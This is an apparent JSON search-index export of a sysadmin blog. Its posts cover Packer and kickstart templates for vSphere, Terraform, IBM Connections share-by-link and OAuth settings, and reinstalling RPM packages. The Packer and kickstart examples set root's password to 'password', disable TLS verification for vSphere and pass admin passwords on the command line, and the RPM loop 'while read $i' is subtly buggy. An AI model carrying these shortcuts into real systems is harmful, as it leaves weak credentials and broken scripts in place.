\u0026#34;ssh-pub-key=$(cat ~/.ssh/stoeps_rsa.pub)\u0026#34; Next Ansible Next step will be further provisioning with Ansible . This can run separately, or as a post-provisioning task from Terraform.\n","excerpt":"\u003cp\u003eMy last \u003ca href=\"/2019/06/02/20190602-packer-template-vsphere/\"\u003earticle\u003c/a\u003e\n showed how to build a server template with \u003ca href=\"https://packer.io\" target=\"_blank\"\u003ePacker \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eNow we want to use this template to create some servers on VMware vSphere.\nDNS will be registered manually and all IP addresses will be defined as fixed in the config files.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190605-terraform-vsphere/","title":"Provision servers with Terraform on vSphere"},{"body":"The last months I built a lot of environments for tests with IBM Connections Componentpack, Rancher, plain Kubernetes, IBM Domino and some more. In former years, I deployed single virtual machines, cloned them and created snapshots to \u0026ldquo;easily\u0026rdquo; jump back in cases of errors. Then I found Packer , which helped me to automate the first virtual machines on my local notebook.\nNow I use Packer to create templates for VMware vSphere, which then are deployed and multiplied with Terraform . Terraform needs some packages installed in the template, that it can provision virtual machines on vSphere.\nOpen VM-Tools\nPerl\nYou can find all files and scripts on Gitlab.\nThe definition is simplified to make it better readable. As best practise I would recommend to add a variabe section to the packer file, so you avoid to type the same information over and over again.\nIn this article I just prepare the template. Working with Terraform will be covered in a future post.\nOne thing more, to install additional software on the provisioned servers later, I will use Ansible . Ansible needs ssh and Python .\nFirst CentOS template To create a template for CentOS, we start with a kickstart file, which is used by Packer to install and configure the template.\nCreate a root password\necho \u0026#39;import crypt,getpass; \\ print crypt.crypt(getpass.getpass(), \u0026#34;$5$16_CHARACTER_SALT_HERE\u0026#34;)\u0026#39; | python - Replace $16_CHARACTER_SALT_HERE with 16 random characters.\nExample to generate 16 random characters\nopenssl rand -base64 24 | cut -c-16 Kickstart File You can find one in my GPN19 repo at Gitlab.com .\nSimple kickstart file\ninstall lang en_US.UTF-8 keyboard de timezone Europe/Berlin auth --useshadow --enablemd5 services --enabled=NetworkManager,sshd eula --agreed ignoredisk --only-use=sda reboot bootloader --location=mbr zerombr clearpart --all --initlabel part swap --asprimary --fstype=\u0026#34;swap\u0026#34; --size=1024 part /boot --fstype xfs --size=200 part pv.01 --size=1 --grow volgroup rootvg01 pv.01 logvol / --fstype xfs --name=lv01 --vgname=rootvg01 --size=1 --grow authconfig --enableshadow --passalgo=sha256 rootpw --iscrypted $5$cnxfyyiayqjelmbt$4/Lq1vPDBp2BZznXcLukwVy4n0DPp6tX.PrCz7YA62B %packages --nobase --ignoremissing @core %end Packer JSON To tell Packer how our template should be installed, start with following file :\n{ \u0026#34;builders\u0026#34;: [ { \u0026#34;type\u0026#34;: \u0026#34;vmware-iso\u0026#34;, \u0026#34;boot_command\u0026#34;: [ \u0026#34;\u0026lt;tab\u0026gt; text ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/kickstart-de.cfg\u0026lt;enter\u0026gt;\u0026#34; ], \u0026#34;communicator\u0026#34;: \u0026#34;ssh\u0026#34;, \u0026#34;guest_os_type\u0026#34;: \u0026#34;centos7-64\u0026#34;, \u0026#34;http_directory\u0026#34;: \u0026#34;http\u0026#34;, \u0026#34;iso_checksum_type\u0026#34;: \u0026#34;sha256\u0026#34;, \u0026#34;iso_checksum_url\u0026#34;: \u0026#34;http://ftp.halifax.rwth-aachen.de/centos/7.6.1810/isos/x86_64/sha256sum.txt\u0026#34;, \u0026#34;iso_url\u0026#34;: \u0026#34;http://ftp.halifax.rwth-aachen.de/centos/7.6.1810/isos/x86_64/CentOS-7-x86_64-Minimal-1810.iso\u0026#34;, \u0026#34;ssh_username\u0026#34;:\u0026#34;root\u0026#34;, \u0026#34;ssh_password\u0026#34;:\u0026#34;password\u0026#34;, \u0026#34;ssh_wait_timeout\u0026#34;: \u0026#34;600s\u0026#34;, \u0026#34;shutdown_command\u0026#34;: \u0026#34;shutdown -P now\u0026#34;, \u0026#34;version\u0026#34;: 14 } ], \u0026#34;provisioners\u0026#34;: [ { \u0026#34;type\u0026#34;: \u0026#34;shell\u0026#34;, \u0026#34;expect_disconnect\u0026#34;: true, \u0026#34;execute_command\u0026#34;: \u0026#34;sudo UPDATE=true bash \u0026#39;{{ .Path }}\u0026#39;\u0026#34;, \u0026#34;environment_vars\u0026#34;: [ \u0026#34;UPDATE=true\u0026#34; ], \u0026#34;scripts\u0026#34;: [ \u0026#34;script/epel.sh\u0026#34;, \u0026#34;script/kernel.sh\u0026#34;, \u0026#34;script/sshd.sh\u0026#34;, \u0026#34;script/vmtools.sh\u0026#34;, \u0026#34;script/update.sh\u0026#34;, \u0026#34;script/reboot.sh\u0026#34;, \u0026#34;script/ansible.sh\u0026#34;, \u0026#34;script/cleanup.sh\u0026#34; ] } ], \u0026#34;post-processors\u0026#34;: [ [ { \u0026#34;type\u0026#34;: \u0026#34;vsphere\u0026#34;, \u0026#34;cluster\u0026#34;: \u0026#34;HMUC PWR HOSTS\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;vsphere.example.com\u0026#34;, \u0026#34;datacenter\u0026#34;: \u0026#34;HMUC\u0026#34;, \u0026#34;resource_pool\u0026#34;: \u0026#34;rp_hvie_devops\u0026#34;, \u0026#34;username\u0026#34;: \u0026#34;cstoettner@example.com\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;{{user `vsphere_password`}}\u0026#34;, \u0026#34;datastore\u0026#34;: \u0026#34;devops-01_sas_7.2k_raid10\u0026#34;, \u0026#34;vm_name\u0026#34;: \u0026#34;stoeps-centos-gpn19\u0026#34;, \u0026#34;vm_folder\u0026#34;: \u0026#34;devops\u0026#34;, \u0026#34;vm_network\u0026#34;: \u0026#34;vm-net-devops\u0026#34;, \u0026#34;disk_mode\u0026#34;: \u0026#34;thin\u0026#34;, \u0026#34;insecure\u0026#34;: \u0026#34;true\u0026#34;, \u0026#34;overwrite\u0026#34;: \u0026#34;true\u0026#34; }, { \u0026#34;type\u0026#34;: \u0026#34;vsphere-template\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;vsphere.example.com\u0026#34;, \u0026#34;insecure\u0026#34;: \u0026#34;true\u0026#34;, \u0026#34;datacenter\u0026#34;: \u0026#34;HMUC\u0026#34;, \u0026#34;username\u0026#34;: \u0026#34;cstoettner@example.com\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;{{user `vsphere_password`}}\u0026#34;, \u0026#34;folder\u0026#34;: \u0026#34;/devops/templates\u0026#34; } ] ] } Builder (building the vmware itself)\nProvisioner (run some scripts on the new deployed machine)\nPost-Processor (upload to VMware vSphere)\nThe order is important, or Terraform can’t recognize the vm tools\nPost-Processor to upload the VM to vSphere\nPost-Processor to tag it as template\nI set the root password to password in the kickstart\nThe kickstart file generates the user root with password password. During the deployment with Terraform I disable the password login with passwd -l root, so the root user needs to use a ssh-key for authentication.\nThanks to Nico for the tip with passwd --lock.\nThis configuration file uses a lot of default values from VMware, like disk space, cpu count and so on. All these can be changed later during our Terraform deployment.\nWithin the Provisioner part, I use some scripts, to add:\nEPEL repository\nInstall open-vm-tools, perl, python\nUpdate all installed packages\nUpdate the kernel to the latest version (in the moment 5.1)\nThe original CentOS kernel is quite old and the Docker support needs some tweaks like the usage of device-mapper, that’s the main reason for the update Reboot (important to do this after the open-vm-tools installation, because without Terraform will not recognize the tools and not deploy)\nCleanup (deleting host keys, repositories and so on)\nDuring my talk at GPN19, someone pointed me to Systemd machine id . I always ignored this, but I added the delete command to the cleanup script and the create command into my Terraform file. Thanks for this hint!\nCreate the template packer build -var vsphere_password=My_Vsphere_password centos.json I use a variable for the password, because I always check-in my definition files to git and I don’t want to have passwords there in the history.\nI created a video of the creation, please try the command yourself, or have a look at it.\nNow our template is uploaded to vSphere. Using it within Terraform will be another post.\n","excerpt":"\u003cp\u003eThe last months I built a lot of environments for tests with IBM Connections Componentpack, Rancher, plain Kubernetes, IBM Domino and some more.\nIn former years, I deployed single virtual machines, cloned them and created snapshots to \u0026ldquo;easily\u0026rdquo; jump back in cases of errors.\nThen I found \u003ca href=\"https://packer.io\" target=\"_blank\"\u003ePacker \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which helped me to automate the first virtual machines on my local notebook.\u003c/p\u003e\n\u003cp\u003eNow I use Packer to create templates for VMware vSphere, which then are deployed and multiplied with \u003ca href=\"https://terraform.io\" target=\"_blank\"\u003eTerraform \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nTerraform needs some packages installed in the template, that it can provision virtual machines on vSphere.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190602-packer-template-vsphere/","title":"Create vSphere Template with Packer"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/packer/","title":"Packer"},{"body":":icons: font\nSince thursday the gpn19 (Gulasch Programmiernacht) is taking place in Karlsruhe at ZKM. I’m happy that I got the chance to give two talks:\nDocumentation with any editor Automate your Infrastructure Deployment All sessions of GPN will be recorded and are available at https://media.ccc.de/b/conferences/gpn/gpn19 . There was a technical problem during my first talk, so the recording can’t be found there. Sorry for that.\nAll code snippets I showed during that talks can be found here:\nhttps://gitlab.com/stoeps/gpn19-documentation https://gitlab.com/stoeps/gpn19-iac If you’re around, or living in that area, join us there. It’s well organized and free to attend! The organizers are asking for a donation when you’re attending.\nMore informations can be found in the FAQ .\nAgenda ","excerpt":"\u003cp\u003e:icons: font\u003c/p\u003e\n\u003cp\u003eSince thursday the \u003ca href=\"https://entropia.de/GPN19\" target=\"_blank\"\u003egpn19 (Gulasch Programmiernacht) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is taking place in Karlsruhe at ZKM.\nI’m happy that I got the chance to give two talks:\u003c/p\u003e\n\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \n \u003c/a\u003e\n\u003c/span\u003e\n\n\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-AutomateYourInfrastructure.html\" target=\"_blank\"\u003eAutomate your Infrastructure Deployment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \n \u003c/a\u003e\n\u003c/span\u003e","ref":"https://stoeps.de/posts/2019/20190601-gpn19/","title":"Gulasch Programmiernacht 2019 - #gpn19"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/iac/","title":"IAC"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/infrastructure-as-code/","title":"Infrastructure as Code"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/speaking/","title":"Speaking"},{"body":"Admincamp Docker was ist das eigentlich? IBM Connections administrieren Gulasch Programmiernacht 2019 Documentation with any editor Automate your Infrastructure Deployment Automate your Infrastructure Deployment Froscon 14 Documentation with any editor Documentation with any editor Social Connections 15 How being a Connections administrator gave me gray hairs ","excerpt":"\u003ch2 id=\"admincamp\"\u003eAdmincamp \u003ca href=\"#admincamp\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC19-T2S1-DockerWasIstDasEigentlich.html\" target=\"_blank\"\u003eDocker was ist das eigentlich? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC19-T2S2-IBMConnectionsAdministrieren.html\" target=\"_blank\"\u003eIBM Connections administrieren \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"gulasch-programmiernacht-2019\"\u003eGulasch Programmiernacht 2019 \u003ca href=\"#gulasch-programmiernacht-2019\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/GPN19-AutomateYourInfrastructure.html\" target=\"_blank\"\u003eAutomate your Infrastructure Deployment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://media.ccc.de/v/gpn19-111-automate-your-virtual-server-deployments\" target=\"_blank\"\u003eAutomate your Infrastructure Deployment \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \n \u003ci class=\"las la-video la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"froscon-14\"\u003eFroscon 14 \u003ca href=\"#froscon-14\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/Froscon14-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://media.ccc.de/v/froscon2019-2389-documentation_with_any_editor\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \n \u003ci class=\"las la-video la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"social-connections-15\"\u003eSocial Connections 15 \u003ca href=\"#social-connections-15\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/SocCnx15-HowBeingAConnectionsAdministratorGaveMeGrayHairs.html\" target=\"_blank\"\u003eHow being a Connections administrator gave me gray hairs \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2019/","title":"Talks 2019"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/files/","title":"Files"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sharing/","title":"Sharing"},{"body":"The last IBM Connections 6.0 CR4 introduced the new feature \u0026ldquo;Sharing Files via Link\u0026rdquo;. A quite handy way to share files with users by link. Just open the file, go to sharing and select \u0026ldquo;Share by Link\u0026rdquo;.\n\u0026ldquo;Share by Link\u0026rdquo; makes it easy to share and grant read access to personal and Community files.\nWe tested the feature and it works like a charm, but…​\n— What\u0026rsquo;s New in IBM Connections Cumulative Release 4\nEverybody who gets this link, can download the shared file (and share the link with others)\nEven in restricted communities everybody with editor access can create the link\nThe users are not added to the readers field (like mentioned here )\nYou don’t see in About \u0026gt; Views who or that anybody downloaded the file So you don’t know if, who or how many users have downloaded your shared file.\nOn the screenshot you see my testldap user, I tested with this one too, but he has the admin role of all applications, so he can see the file directly in the viewer and he appears in the Viewer list. A user with default access right does not see the Docs Viewer, they only have the option to download the file.\nIn my eyes that’s nothing I want to have active in my environments. To deactive this feature, go to Gatekeeper (you need to have the admin role in the application Common) and change FILES_ENABLE_FILE_SHARE_WITH_LINK to FALSE.\nURL to Gatekeeper: https://yourconnectionsurl.example.com/connections/config/highway.main.gatekeeper.tiles No reboot needed, after a refresh the option for sharing with link has disappeared.\nShared file links generate a \u0026ldquo;Page Not Found\u0026rdquo; error message after disabling the feature. If you reenable it, old sharing links are working again.\nChanges with Gatekeeper can be tested on the fly. So no reboots or restarts needed. Just try it.\nUpdate 06.03.2019 The original post was from 25th of february, but I need to update some things.\nToday I checked the functionality again and I think there is only a tiny bit missing to have a working solution, which hopefully can be delivered with an update.\nThere are differences in the sharing by link, when you share a personal and a community file. It is important if the file can be opened by the IBM Docs Viewer!\nSo I found several dependencies:\nA personal file shared by link which can’t be viewed in the Docs Viewer, can be downloaded by everybody who has the link and the downloading user is not visible in the \u0026ldquo;Views\u0026rdquo; Secion of the file.\nA personal file which can be opened in the Docs Viewer will create an entry in the \u0026ldquo;Views\u0026rdquo; Section!\nFor community files it is important if the file is viewable in the Docs Viewer and if the user already can access the file (public communities, or users which already are members in the community). I haven’t checked the dependencies with the Docs Viewer in that case. So users which get access to the file through the link (not member, not public shared) are not appearing in the \u0026ldquo;Views\u0026rdquo;.\nAnd a really important point: User with editor access in community can only share files by link which they uploaded to the community. Files from owners or other members can’t be shared!\nOwners are able to share any file of a community by link.\nI’m still not completely happy with the implementation, but I will activate it, when the users can see all downloads and views.\n","excerpt":"\u003cp\u003eThe last \u003ca href=\"https://www.ibm.com/support/knowledgecenter/en/SSYGQH_6.0.0/admin/overview/i_ovr_r_whats_new.html\" target=\"_blank\"\u003eIBM Connections 6.0 CR4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n introduced the new feature \u0026ldquo;Sharing Files via Link\u0026rdquo;.\nA quite handy way to share files with users by link.\nJust open the file, go to sharing and select \u0026ldquo;Share by Link\u0026rdquo;.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u0026ldquo;Share by Link\u0026rdquo; makes it easy to share and grant read access to personal and Community files.\u003c/p\u003e\n\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2019/20190225-fileshareing-cnx6cr4/","title":"Updated - Thoughts About Sharing Files Via Link - IBM Connections 6.0 CR4"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mobile/","title":"Mobile"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/oauth/","title":"OAuth"},{"body":"A lot of people don’t like to store credentials in mobile apps or browsers. A good workaround is the usage of OAuth 2.0 tokens, but the application needs to support it and the server you’re talking to too. The IBM Connections Mobile App can use it for authentication.\nOAauth2 can be used directly with WebSphere Application Server and Connections 6.0. There are no special OAuth servers or applications needed!\nThe Documentation at IBM was a little bit confusing for me, there are lots of sidenotes, but you just need to do following steps, to use OAuth 2.0 token-based authentication with the IBM Connections Mobile App.\n== Register Client\nOpen wsadmin and add the client identifier for the mobile app:\ncd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -username was-user -password password execfile(\u0026#39;oauthAdmin.py\u0026#39;) OAuthApplicationRegistrationService.addApplication(\u0026#34;connections_social_mobile\u0026#34;, \u0026#34;Connections Mobile\u0026#34;, \u0026#34;com.ibm.ibmscp://com.ibm.mobile.connections/token\u0026#34;) Now open connectionsProvider.xml in /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/cellName/oauth20/! Set the following value to true:\n\u0026lt;parameter name=\u0026#34;oauth20.allow.public.clients\u0026#34; type=\u0026#34;cc\u0026#34; customizable=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;value\u0026gt;true\u0026lt;/value\u0026gt; \u0026lt;/parameter\u0026gt; Default is false here! Now the OAuth Provider needs to be recreated (start command in Dmgr01/bin):\nLinux\n./wsadmin.sh -lang jython -conntype SOAP -c \u0026#34;print AdminTask.createOAuthProvider(\u0026#39;[-providerName connectionsProvider -fileName /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/nameCell01/oauth20/connectionsProvider.xml]\u0026#39;)\u0026#34; -username wasadmin -password password Windows\nwsadmin.bat -lang jython -conntype SOAP -c \u0026#34;print AdminTask.createOAuthProvider(\u0026#39;[-providerName connectionsProvider -fileName d:/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/nameCell01/oauth20/connectionsProvider.xml]\u0026#39;)\u0026#34; -username wasadmin -password password The Documentation tells you to restart all Application Servers now. I would wait until you finished the mobile-config.xml changes.\nEnable OAuth in mobile-config.xml mobile-config.xml\n... \u0026lt;!-- SECURITY SETTINGS SECTION --\u0026gt; \u0026lt;SecuritySettings enabled=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;AuthType\u0026gt;OAuth\u0026lt;/AuthType\u0026gt; ... \u0026lt;OAuthAuthorizationURL\u0026gt;https://yourcnx-webserver-name/oauth2/endpoint/connectionsProvider/authorize\u0026lt;/OAuthAuthorizationURL\u0026gt; \u0026lt;OAuthTokenURL\u0026gt;https://yourcnx-webserver-name/oauth2/endpoint/connectionsProvider/token\u0026lt;/OAuthTokenURL\u0026gt; \u0026lt;OAuthClientId\u0026gt;connections_social_mobile\u0026lt;/OAuthClientId\u0026gt; ... Change \u0026lt;AuthType/\u0026gt; to this line\nChange \u0026lt;OAuthAuthorizationURL/\u0026gt; to this line, change your CNX Hostname\nChange \u0026lt;OAuthTokenURL/\u0026gt; to this line, change your CNX Hostname\nJust as an information this name was used in the registration command in the first steps (Default)\nWhen you sync the nodes and restart your application servers, the setting is immediately activated! So users already use the Connections Mobile app (with saved credentials) are logged out and need to reauthenticate in the web form for OAuth!\nMobile Client configuration When you add your server to the mobile app, you get the login screen of your Connections environment after providing the server hostname:\nNow the user needs to Grant the Access to the system.\nI tested in a VPN environment and got messages that no profile can be found for my credentials, but reload always showed the content. I think this needs to be tested a little bit more!\n","excerpt":"\u003cp\u003eA lot of people don’t like to store credentials in mobile apps or browsers. A good workaround is the usage of OAuth 2.0 tokens, but the application needs to support it and the server you’re talking to too. The IBM Connections Mobile App can use it for authentication.\u003c/p\u003e\n\u003cp\u003eOAauth2 can be used directly with WebSphere Application Server and Connections 6.0. There are no special OAuth servers or applications needed!\u003c/p\u003e\n\u003cp\u003eThe \u003ca href=\"https://www.ibm.com/support/knowledgecenter/SS5JS8/admin/oauth2-overview.html\" target=\"_blank\"\u003eDocumentation at IBM \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n was a little bit confusing for me, there are lots of sidenotes, but you just need to do following steps, to use OAuth 2.0 token-based authentication with the IBM Connections Mobile App.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190122-oauth-connections-mobile/","title":"Use OAuth 2.0 token-based authentication with IBM Connections Mobile App"},{"body":"In the last days I had a problem with a crashed virtual disk on a WebSphere Application Server. The backup team was able to recover all the data, but the operating system needs to be reinstalled. The operating system was Red Hat Linux, so rpm-based. One of the first tasks after recovery was to identify and reinstall missing packages.\nA big advantage was that several WebSphere nodes were used in this environment, the Deployment Manager was still intact, and a still working server could be used as a basis for determining the missing packages.\nI used the following commands:\nOn a working node\nrpm -qa | sort \u0026gt; all-packages-node1.txt On the restored machine\nrpm -qa | sort \u0026gt; all-packages-restored.txt Now we need to compare the lists and generate a list of all missing packages:\ncomm -23 all-packages-node1.txt all-packages-restored.txt \u0026gt; missing-packages.txt So we have a list of missing packages, in this case I had to install about 200 packages. I’m a little lazy and didn’t want to enter or copy and paste all the package names. So let’s use a short bash snippet (not very elegant, but it works):\nwhile read $i; do sudo yum -y install $i done \u0026lt; missing-packages.txt The installation process takes a few minutes, but after that all missing packages should be reinstalled. If additional repositories are needed, they should be reactivated or added before the installation process. Manually installed RPM packages can be found by repeating the above procedure and checking for missing packages.\nI also used these snippets when I changed my working machine. So I created a backup list of all installed applications and reinstalled everything on the new computer.\nPoints learned\nI now regularly create the list of installed packages so that it can be stored on the backup tapes and used during recovery.\n","excerpt":"\u003cp\u003eIn the last days I had a problem with a crashed virtual disk on a WebSphere Application Server.\nThe backup team was able to recover all the data, but the operating system needs to be reinstalled.\nThe operating system was Red Hat Linux, so rpm-based.\nOne of the first tasks after recovery was to identify and reinstall missing packages.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20181211-install-all-packages-of-other-rpm-based-linux/","title":"Install All Packages After Restore on RPM-based Linux"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/rpm/","title":"RPM"},{"body":"Docker Mannheim Meetup Kubernetes 101 Social Connections 14 Kubernetes 101 Kubernetes 101 Admincamp IBM Connections Administrieren IBM Connections Administrieren IBM Connections Adminblast IBM Connections Adminblast Docker - Was ist das eigentlich? Docker - Was ist das eigentlich? During Admincamp I did a workshop about Docker too. I used a Jupyter Notebook to show all commands. As promised I uploaded all used files and the workbook in Jupyter and html format to Gitlab.\nGitlab with all files: https://gitlab.com/stoeps/ac2018-docker-handson Direct link to workbook: https://gitlab.com/stoeps/ac2018-docker-handson/blob/master/DockerHandsOn-Admincamp2018.ipynb if you open that directly at gitlab, it will render. Or you use the html copy of the document. All files which are used in the workbook (Dockerfiles, Js, html) are all available in the repository. Please download as zip, or clone it with git.\nTo do all the practical stuff, you can download a live linux e.g. at https://ubuntu.com/Download and install Docker, or you install Docker native on your Windows, Mac or Linux Host. The installation procedure is documented on https://docs.docker.com .\nFroscon13 Documentation with any editor Documentation with any editor ","excerpt":"\u003ch2 id=\"docker-mannheim-meetup\"\u003eDocker Mannheim Meetup \u003ca href=\"#docker-mannheim-meetup\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/Meetup-MA-KubernetesBasics.html\" target=\"_blank\"\u003eKubernetes 101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"social-connections-14\"\u003eSocial Connections 14 \u003ca href=\"#social-connections-14\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/SocCnx14-KubernetesBasicsForConnectionsAdmins.html\" target=\"_blank\"\u003eKubernetes 101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/SocCnx14-KubernetesBasicsForConnectionsAdmins.pdf\" target=\"_blank\"\u003eKubernetes 101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"admincamp\"\u003eAdmincamp \u003ca href=\"#admincamp\"\u003e\u003ci 